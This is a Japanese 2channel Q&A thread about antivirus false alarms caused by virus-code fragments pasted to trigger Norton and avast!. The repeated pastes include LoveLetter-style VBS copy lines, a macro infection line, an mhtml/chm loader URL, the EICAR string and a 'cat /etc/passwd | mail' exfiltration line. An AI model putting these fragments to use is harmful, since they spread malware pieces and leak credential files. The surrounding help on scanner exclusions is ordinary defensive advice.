Avastですが191の方法でも駄目です。 私だけでもないようです 524 :名無しさん@お腹いっぱい。 :2005/06/11(土) 16:44:33 こんにちは。質問です。 2ちゃんを見てると時々ウイルスが発見されて スレ自体が見られなくなるんですが、良い解決策があれば教えてください。 2ちゃんブラウザはギコナビ、アンチウイルスはavast!です。 発見されるウイルスはWin32:Mhtplo-26 [Trj]ってのです。 avastの設定の「例外」に 2ちゃんのlogファイルを入れてみたんですがそれでも駄目でした。
最近PCが重い! │ ├ 1.PCを買い換える │ │ [まちがい] │ 確実な方法ではありますが、お金がかかるのが難点です。 │ それよりも別の手段を探してみませんか? │ ちょっとしたフリーウェアでなんとかなるかも? │ ↑ │ ココがポイント! │ └ 2.RegSeekerを使う [せいかい] Regseeker http://www.hoverdesk.net/freeware.htm RegSeeker1.3Beta日本語ファイル http://downloads.at.infoseek.co.jp/ >>494 ここにavastユーザーはあまりこないので
誘導されたこととテンプレをよく読んで
より詳しい環境を添えて↓で聞いてください。
avast! Anti-Virus Part41
http://pc8.2ch.net/test/read.cgi/sec/1143369350/ 最初そちらに書き込もうと思ったのですが 質問できる雰囲気じゃないんです。
>>501 新スレに移行しましたね。
avast! Anti-Virus Part43
http://pc8.2ch.net/test/read.cgi/sec/1143473121/ >>500 にもありますがテンプレをよく読んで誘導されたこととより詳しい環境を添えて聞いてください。
嵐があっても見てくださる人はいます。
チャットではないので即レスは期待しないでくださいね。
邪魔が入ってスルーされたと感じて再投稿する場合や再質問する場合は最初に質問したレス番を名前欄に入れてください。
参考に
一般的な質問の仕方
http://ansitu.xrea.jp/guidance/?methodofquestion 502さんありがとう。 流れが相変わらず速いので機を見て質問することにします。 次回はNortonだけでなくAvastもスレのタイトルに加えてください。
Wscript.KakWormっていうウィルスを↓のスレを見るたびに感染します。
http://sakura01.bbspink.com/test/read.cgi/ascii/1135064245/l50 (´・ω・`)ボスケテ
ノートンさんが反応します。
>>511 初心者なもので分かりませんorz683とは何ですか?
http://money4.2ch.net/test/read.cgi/pachij/1140536153/ ここのすれの>>457のところにウイルスコードがあってあるので、
ノートンを立ち上げて、オプション→オートプロテクト→除外→新規→フォルダー?アイコン→
ローカルディスク(C)→プログラムファイル→Live2ちゃん→log→money4.2ch.net→pachij→
1140536153と1140536153.idx→すべてOKで閉じ
をしたのに、相変わらず上のスレではノートンが反応します。
再度除外項目を見たのですがきちんと除外項目に入ってました。
何故反応するのでしょうか??
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
>>519 ,522
・・・
>>1 2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
ログフォルダの場所等についてはお使いの2ちゃんねるブラウザの配布サイト・ヘルプ・スレ等で確認してください。
また、これとは別にワーム誤反応対策の設定もしてね。
http://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures 2chNIS問題まとめページ
http://mickey.mirv.net/2chnis.html 一昨日くらいからスレが見れなくなった もちろんログ除外はしてあるのに、ノートン切ると見れる どうして?ちなみに専ブラはギコナビ
>>524 ログ除外以外にもやる事がある
>>1 から読め
c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ kak.hta';ken=wd+'START End Sub <body onload=window()> にくちゃんねるでログ漁ってたら「ワーム検出で遮断」とかで結局目的のスレが見られないんだが諦めるしかないのかな。 htmlを拡張子の検出対象から外すのもアレだし、ワーム防止をオフにするのもあんまりよろしくなさそうなんだがね。 エロイ人でもエロくない人でも良いから詳しく知ってる人教えておくれ。
>NIS2005の場合(多分NIS2006も同じ) 同じではない件に付いて
>>524 と同じ症状です。
ここ1週間から出てる。
, -'"´  ̄`丶、_ ,.∩ `ヽ 〃∪'´ ̄`二二人\ ヽ | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ', |ハ ,ニ、 ,. - 、 | | | l | | ハ ィハ ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、 | | | じ' |トJ〉 /)} l | 違う板にコピペすると鬼のような怖い顔 | ハ 、'_,  ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。 l l /\ .. イV\川 | ,' l l ,イ `l ̄´ / /ヽl l l | l ハ `メ、 〃 ヽヽ、__ノ l ∨ └‐イ「ト--ァ'´ ハヽ__ノ ヽ/ } l」」 / / }`ー 〈_n| 八 / / /ノ 〈二二人 c /\/ / , イ / /厂 /\__>< {_
, -'"´  ̄`丶、_ ,.∩ `ヽ 〃∪'´ ̄`二二人\ ヽ | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ', |ハ ,ニ、 ,. - 、 | | | l | | ハ ィハ ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、 | | | じ' |トJ〉 /)} l | 違う板にコピペすると鬼のような怖い顔 | ハ 、'_,  ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。 l l /\ .. イV\川 | ,' l l ,イ `l ̄´ / /ヽl l l | l ハ `メ、 〃 ヽヽ、__ノ l ∨ └‐イ「ト--ァ'´ ハヽ__ノ ヽ/ } l」」 / / }`ー 〈_n| 八 / / /ノ 〈二二人 c /\/ / , イ / /厂 /\__>< {_
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail
[email protected] If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Live2ch使ってます NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。 もちろんスレは見れない状態です。 どうすれば回避できますか?
___ / \ ________ / ´` \ / | ・ ・ | <おい糞元祖ぶる殿 ◆U/gDqFZzsY.急ぎでラーク買うて来い | (● ●) | \________ \ ⊂ニ⊃ ノ \ ⊂ニ⊃  ̄ ̄ ̄
>>540 レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね?
それとも止めといたほうがいいですか?(このファイルを削除しても意味無しですよね)
よろしければレスお願いします。
>>541 ID隠して騙りは止めてね
>>540 言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。
>>542-543 こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。
注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。
>>545 わざわざ再現までしていただき(しかもこんな夜中に)すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます!
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。
こんばんは。
>>17 のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。
bbs.cgiが更新されて
>>4 のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな
ダメですた
http://news18.2ch.net/test/read.cgi/mnewsplus/1149087966/66 >>4 は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな
>>552 >>4 の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。
どっちにしろ置換するようになったんだから
>>4 は大幅書き換えが必要
こんばんは。
>>17 のソフトですが、フォルダの設定によって検索できない場合
がありましたので、修正しました。
http://www.geocities.jp/cen_hp/index.html >>556 Q. 2chが文字を置換しないのが悪いって聞いたんだけど
A. 情報が古いと思われます。2006年6月から置換するようになりましたが、
問題の文字を使わなくてもノートンが誤検出する文字列は作れるので
相変わらず反応する場合があります。
↑とか追加した方がいい。単に消すと
> 「親切にも」追記する人が現れかねないから
を防げない。
jane doe view使ってるんですが、 ノートントラップのウィルスコード貼られたスレ取得障害になったり、 ここのPC初心者板なんかはノートン切らないと来れません。 それで対策として書かれてる見て、 ノートンアンチウィルスの手動&オートの除外項目から、 viewのLogsフォルダを両方除外したんですが、 それでも駄目なままです。 他に何をしないといけないんでしょうか?
ウィルスコードに反応したせいで、取得したログが消滅するのについては、 ログフォルダを除外すればいけるわけですが、 最近のウィルスコードは進化してて、 Autoblockで侵入感知反応してしまって、 2chの該当IPをアク禁にしてしまってるようなんです。 この場合の対応はどのようにすればよいでしょうか? ノートン切らないと、ログを取得するどころか、 スレ単位、はなはだしくは板単位でアクセスすらできません。
どの専ブラでも基本はログと書き込みフォルダを 除外すればおk?
p + w * 10 <br> End Sub <br> LOVE-LETTER-FOR-YOU
さっきこのウィルスソースが2ちゃん掲示板に埋められてるのを見てしまったら、 ウィルスソフトは反応しなかったのですが、 いきなり2ちゃん掲示板の行間が広くなってしまいました。 ネットから接続を切って履歴とかTemporaryInternetFileとか全部削除してから ウィルスチェックをしましたが反応なし。 これはブラウザの表示は変になったけど感染はしなかったということで大丈夫なのでしょうか? ブラウザは専ブラじゃなくIEで、ウィルスソフトはソースネクストのウィルスセキュリティです。
>>570 行間が広くなるのはシリア語ブラクラじゃないのか?
>>572-573 レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか?
初めて聞いたもので>シリア語ブラクラ
さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね?
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ | ○。 | ノノ) 从 ( i从〓〓 〓〓.从 .从-=・=- -=・=-从 从从. l 从) (从.l∴ ∨ ∴从人) (人人|∴ ヽ .ー===-' ./.∴..从人) <無職元祖ぶる殿 ◆U/gDqFZzsY蚤 (人人|∴∴!  ̄ !∴∴l从人) (人人|∴∴!. !∴∴l从人) (人人|∴∴!. !∴∴l从人) ..(人人人_人____人_.人人人) 〔ノ二二,___ __,二二ヽ〕 |:::::::::::::::::::::::::ヽ゜ ゜/:::::::::::::::::::::::::/ 〉::::::::: :::::::::::::〉__∩__〈:::::::::::::: ::::::::〈 |:::::::::::::::::::::::/\ ̄/ヽ:::::::::::::::::::::/ 〔:::::::::::::::::::::/ ノ ~ヽ ヽ::::::::::::::::::| ヽ:::::::::::::::::/ /:::::::::::: \ ):::::::::::::::::::ゝ ノ:::::::::::::::::::| |_〜─ー= - | |〜〜〜/
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
http://ansitu.xrea.jp/guidance/?NortonInternetSecurity このサイトに書かれてる、信頼のアドレスを追加の設定はしました。
エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?
>>578 僕の分かるように1〜10までしっかりすべてと教えて下さい。 さっさと、教えろボケこのやろう ∧_∧ ,,,,,,,,,,,,,,,∧,,∧ ( ´∀`) \ 〜′,,,,,,,,,,ミ,,゚Д゚彡 / つ℃━━━━━━━━━━━━ UU""""U U 〜(_つ つ \へへ_ | ――――――――――――――――| . | | | |へ__ . | | | へ____へ__/___へへ__へ______ | | | | (( | )) | | | | | |〜〜〜ヽ`∀´>ヾ〕∈ >>2 ё
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
時々スレを転々としてると、急に変な改行になるんですが(文と文の隙間が全部空いてしまう) これってウイルスに侵されてるのでしょうか?
l'vヘ ハ ┌( ;/ ト, ,、 rヘ r'^ナrジ-z __}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr〜^′ 'っヾ、r'__ |レ'ノ_C'入彳勺ソメろ_j/し-,_ `フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐' <_ゝし||フぅ(ひzメ__ゝ'l !'そ ~zヾ|て 、l レ^ //'| |'~ | | ヽl| // }| | :! || | | ,/ ,' | :{. || | |/ / すいません、ちょっと通りますよ・・・ l !|| | | / ヽ ヽ.|/ // _,r)_ j (_,( ciz ,ノこ_- __,ーヽ ん|Zゥ レz zjそ_ } ... 丿 ろ、,_!|乙7ムLそ/し-z ノ""'' 一( `う.l !シ/ア了//_⊂, /、__ ヽ ^'| |~//,/_ソ ハr^ / ...... ーl | |// //ノ /~"' 、__/ ,,,...} |/ /// _Jv ,、 _,、 {' _ `y′ 一 / r'〜(_ノ z'jく|!ぞぅンそ 人 =/‐- ハ 丿" ''( ぅY||/ソ'/`′ ヽ '' / __,, / / ‐- ''') | レ'// '∨ X. }''' ....ノ ノムxく j ー/ /== ノ'ヽ rご ー( /=‐ r'´-ヽ } ー/'''' { ,ノ'' y' ...) ,' _,, 人 ''"`、 ノ.. '' ノ`ヽ ''"ヽ / ー人.... ( {ー / \ -'} / / \'''}` ('' ィ´ \_ヽ ハ 〈 )八 ( f )ハ. )ノ _)ノ ヽ ) (( )ノ / ー'′
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail
[email protected] If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
このスレに貼ってあるソースは大丈夫なのですか?
例えば
>>580-581 とか、
>>588 とか…
このスレだと反応ないんですが、何か特別なのでしょうか?
>>589 心配しすぎだと思うんです(><)
これが動いたら2chは大騒ぎになっちゃうと思うんです(><)
誘導されてきました 導入しているマカフィーでスキャンかけても何の反応もなかったんですが、 ノートンのオンラインスキャンやってみると 感染ファイルが二個みつかって C:\Program Files\gikoNavi\Log\2ch\aasaloon\Folder.idx は Bloodhound.Exploit.6 に感染しています。 C:\Program Files\gikoNavi\Log\2ch\aasaloon\subject.txt は Bloodhound.Exploit.6 に感染しています。 と言う表示が出ました。 これは危険なんでしょうか。それともただのウィルスコード?
>>594 ありがとうございます。
見分けるコツみたいなものはあるんですか?
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ノートンがvbsウィルスのソースに誤反応3
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/ テンプレにでも入れるか・・・?
脳豚使うなら自力で何とかしろよ・・・
___ゲームキャラ板でもモニカワイイモニカ様___
http://game10.2ch.net/test/read.cgi/gamechara/1146829934/ このスレを開くと閲覧できないどころか
一回再起動しないとgame10鯖に繋がらなくなる障害が出るんですが
NGコードとかどう打って対処すればいいのですか?
使用2chブラウザは Jane Doe Styleです。
>>599 専用ブラウザでスレを取得した「だけ」で反応したら間違いなく誤反応なので心配無用。
スレに貼られたURLをクリックして反応したならウィルスの疑いあり。
てゆーか、やたらとクリックしちゃダメ。
Your attention,Please. みなさまに申し上げます fire drill 火災避難訓練
http://pc7.2ch.net/test/read.cgi/pcqa/1151570961/111- 111 名前:ひよこ名無しさん 投稿日:2006/06/29(木) 21:33:23 ID:P5JFBD43
キャップもらってパスワードもらって、名前欄に書き込んでも、
○★ にならなくて○◆になってしまうんですが、どうしてでしょうか
113 名前:愛新覚羅 ◆WjkbiI..A2 投稿日:2006/06/29(木) 21:34:04 ID:???
>>111 ウイルシかな
>>612 ノートン先生を誤反応させるためにわざと貼ってるんだよ
ただ、これ書いた人がカードゲームのトレードスレに 自分のメルアド出してブログバレしてます
ノートン2006でAutoprotectの設定で、ログのフォルダを除外したいのですが、 それらしい項目が分かりません。 Norton AntiVirusオプションの項目ではないのでしょうか?
専ブラ(Jane)での書き込みの妨害も先生の仕業? 更新かけて解決するのであれば(期限切れ)、 してやらんでもないのだが・・・。
>>618 > 更新かけて解決するのであれば(期限切れ)、
それはないな。FW(が入っているのであれば)一時的に切ってみるしか
>>619 いや、プラウザからなら書き込めるんですよ。 ノートン有効→一部の板の閲覧不可(IE、専ブラ共に) 無効→共に閲覧は可能 専ブラでの書き込みが不可。 ってわけでこの板だけは、IEからしか書き込めないんです・・・。 まぁ、通信を許可すれば解決なんでしょうが・・・。 いろいろやってみます。 どもでした。 まったくの初心者ですが ノートンインターネットセキュリティー2006での誤反応対策を教えてください 既出でしたらアンカーでもいいのでお願いします
「まったくの初心者」 だからどうした?このスレを100回読んで知識増やせ。
スレを開いたら突然ウィルスに感染したんですがurlを直接踏まなくても 感染するウィルスはあるんですか?
, --- 、_ /ミミミヾヾヽ、_ ∠ヾヾヾヾヾヾjj┴彡ニヽ / , -ー‐'"´´´ ヾ.三ヽ ,' / ヾ三ヽ j | / }ミ i | | / /ミ ! } | r、 l ゙iミ __」 |]ムヽ、_ __∠二、__,ィ|/ ィ } |  ̄`ミl==r'´ / |lぅ lj 私が原田ウィルス作者ですが何か? 「!ヽ、_×___j ヽ、× -' レ'r'/ `! j ヽ j_ノ ', ヽァ_ '┘ ,i ヽ ___'...__ i ハ__ ヽ ゙二二 ` ,' // 八 ヽ /'´ / ヽ |ヽ、__, '´ / / \
<body onload=window()> If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l" Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)) できれば既出のものじゃなくて 新しいの一行づつ張ってほしいなぁ。
2CH自体、5月からはじめました。 ノートンがなんだかよくわかりませんが、ある掲示板で症状を書き込んだところ ノートン先生かといわれました。 症状としては、かんじなどを変換すると候補がでますが、するとその時点でIEが 強制終了してしまいます。 2CHはIEでみています。最初から。 これ、直るのでしょうか? パソコン使えないとネットで就職活動もできず困っています。 どうかよろしくお願いします。
>>631 ですけど、感染したときにLOVE-LETTERなんとかというものが画面に表示されました。
そのときなんだかわからなかったので、続行のボタンを押しました。
漢字を変換するとIEが落ちてしまうので、最初に出てきた感じで該当するものが泣ければ
そのままにしています。
なんとかならないでしょうか。
ここはウイルス対策ソフトの「誤反応」のスレです。 ウイルスにほんとに感染してる件ならスレ違い
>>633 よく分からないならクリーンインストールしろ。
それも出来ないなら就職浪人決定。
ウイルスコードの誤反応ではありませんが、 ノートンを切らないとPCQA板に入れなくなってしまいました。(進入検知が誤反応) この場合はどうすればいいでしょうか?
質問お願いします。 ノートン側のオプションから除外指定するとき、 *.dbx *.nch というのが除外の欄に書いてあったのですが、これは最初からそうなのでしょうか? 例えばノートン自体が攻撃されて書き換えられる可能性とかありますか?
>>645 デフォルトでそうなってるから心配すんな
マカフィーでもコード貼られたログファイル消されて見れないんだけどどうすればいい?
でも、ノートン自体は反応しても実際にウイルスではないんですよね?
>643 この対応ってNISだけですよね。 自分ノートンアンチウイルスの方なんだが、やっぱ誤作動する。 これはどう解除すればいいんだ?
>>653 >>643 末尾に挙げられている過去ログでレス番727あたりから読んでみるといいかも
http://mickey.mirv.net/2chnis.html を見て
>タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
をやってみたのですが左クリックをしても何も出てきません。
右クリックなら「Norton Anti Virusを開く」「Auto Protectを無効にする」
「Norton Antiオプション」の三つのメニューが出るんですが、
どうすればNorton Internet Securityを開くことができるんでしょうか。
>>655 もしかしてNAVしかインストールしてないとか?
http://mickey.mirv.net/2chnis.html には説明ないけど
NAVでも誤反応する。
>>654 参照
■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
http://ansitu.xrea.jp/guidance/?Trap#NortonTrap ■2ch NIS問題まとめページ
http://mickey.mirv.net/2chnis.html ■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7 ・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」などの
単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。
・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)
■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq00 727 名前: 動け動けウゴウゴ2ちゃんねる 投稿日: 2006/03/26(日) 16:24:59 ID:pwaEyKGo0
>>726 参考までに・・・ただし、自己責任で
ノートンアンチウイルス2006 Ver.1
http://pc8.2ch.net/test/read.cgi/sec/1129452372/996 > まず、オプション→インターネット→インターネットワーム防止→除外の設定で、
> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。
> そのあと、オプション→インターネット→インターネットワーム防止→
